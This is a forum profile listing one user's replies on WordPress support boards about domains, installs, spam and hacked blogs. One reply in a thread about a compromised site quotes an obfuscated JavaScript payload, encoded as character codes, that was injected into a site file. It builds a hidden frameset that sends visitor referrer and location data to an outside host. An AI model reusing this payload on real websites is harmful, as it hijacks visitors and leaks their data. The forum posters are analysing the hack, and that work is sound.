macsoft3
Forum Replies Created
-
Forum: Everything else WordPress
In reply to: Spy Comment by Yaz OkuluIn case anyone is interested in knowing, the following is another spy comment that was circulated more than 5 hours ago.
“Hello everybody, my name is Damion, and I’m glad to join your community, and wish to assit as far as possible.”
Forum: Everything else WordPress
In reply to: Good Domain CompanyHmm… I don’t quite like GoDaddy because they don’t dismiss the domains run by criminal organizations. But thank you for your valuable information.
Yes, MichaelH. $7-8 is an acceptable price. I’ll check out 1and1.com. Thanks.
Forum: Fixing WordPress
In reply to: How to put an ad in my banner?I have answered similar questions twice or three times. Perhaps, you may want to search it here and ask Google for help.
Forum: Installing WordPress
In reply to: 2 domains, same blogYou can do it easily. No PHP required… Ask Google about “dual domains.” We wrote an article to explain it works some 10 months ago. Do you see the exactly same content at any time at machouse.mhvt.net and machouse.mhouse-j.com, right? How about at seo.mhvt.net/blog/ and seo.mhouse-j.com/blog/ ?
Forum: Fixing WordPress
In reply to: Repeated sucessfull sql injection hacksxxxxxxxxxx
Sorry. Ignore the statement that I made. I prefer to ignore the idiot.
Forum: Fixing WordPress
In reply to: Repeated sucessfull sql injection hacksContent of your wp-includes folder is viewable to anyone. wp-content/themes/ and wp-content/plugins/ are open as well.
Forum: Fixing WordPress
In reply to: Repeated sucessfull sql injection hacksdavesmylie,
What do you mean by “repeated sql injection attacks that dump a few hundred hidden (incredibly) dodgy html links in all my posts.”? Do you mean that you get spam links only in the source code or you actually get spam comments automatically posted in articles?
Forum: Installing WordPress
In reply to: WordPress not installing on Mac OS X TigerSomebody wrote steps to host WordPress on OS X servers 3 or 4 days ago. Perhaps, you may want to search WP Support for that.
Forum: Fixing WordPress
In reply to: My site was ambushed…need help figuring out howThanks, griffman. That means they are constantly hacking WP blogs.
There’s an interesting code embedded in g.js. It’s “118#97#114#32#114#101#102#101#114#101#114#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#114#101#102#101#114#114#101#114#41#59#10#118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#108#111#99#97#116#105#111#110#41#59#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#43#115#117#98#97#99#99#43#34# 38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#43#34#109#101#115#101#116#62#34#41#59#”
I thought I could decode it, but no vail so far.
Ahh, sorry. griffman already decoded it.
Forum: Fixing WordPress
In reply to: My site was ambushed…need help figuring out howThanks, griffman. I got it. jonimueller refers March 13 report to the one at seo.mhvt.net. If you can answer, what is the date stamp on those files in folder 1? Is it March 12 or 13? Or around 02:58 AM on the 15th? I’m just curious. Again, thanks. They started hacking WP websites at least before 11th.
Forum: Fixing WordPress
In reply to: My site was ambushed…need help figuring out howSomeone here on the WP forums warned about it on March 13…
That was our story. The article is shown at p=268. So you’ve got the right link. So far, at least 62 or 63 WordPress blog websites are known to have been exploited in this manner. robservatory.com is not in the list.
griffman, I wonder if you could send those 71 files in zip to junk912@gmail.com? We love junks files and junk mail. Again, we do analyze security issues. Thanks.
Forum: Fixing WordPress
In reply to: Which comments.php file?Try making changes to comments.php in the default theme and using it.
Forum: Your WordPress
In reply to: SPAM Inserts into Blog PostsIs your hosting company Dreamhost? Perhaps, you may want to consult them about server security. There are many simple security measures. And I can’t list them all here.
By the way, your wp-includes folder is wide-open. Its content is viewable.
Forum: Fixing WordPress
In reply to: deleted my wp-config.php file!WP 2.0.11 is what, perhaps 15 months old? I don’t know if anybody still has that old version. Try using 2.3.3’s wp-config.php with correct database name, password and so forth. I have 2.1.2’s wp-config.php, though, if you need it.
===================================================================This is your lucky day. You can download WP 2.0.11 here.
Forum: Fixing WordPress
In reply to: Posting to 10 blogs all at onceYou mean posting the same comment across 10 different blogs? If that’s what you want, then the answer is yes. And that’s what spam terrorists do, using software like XRumer.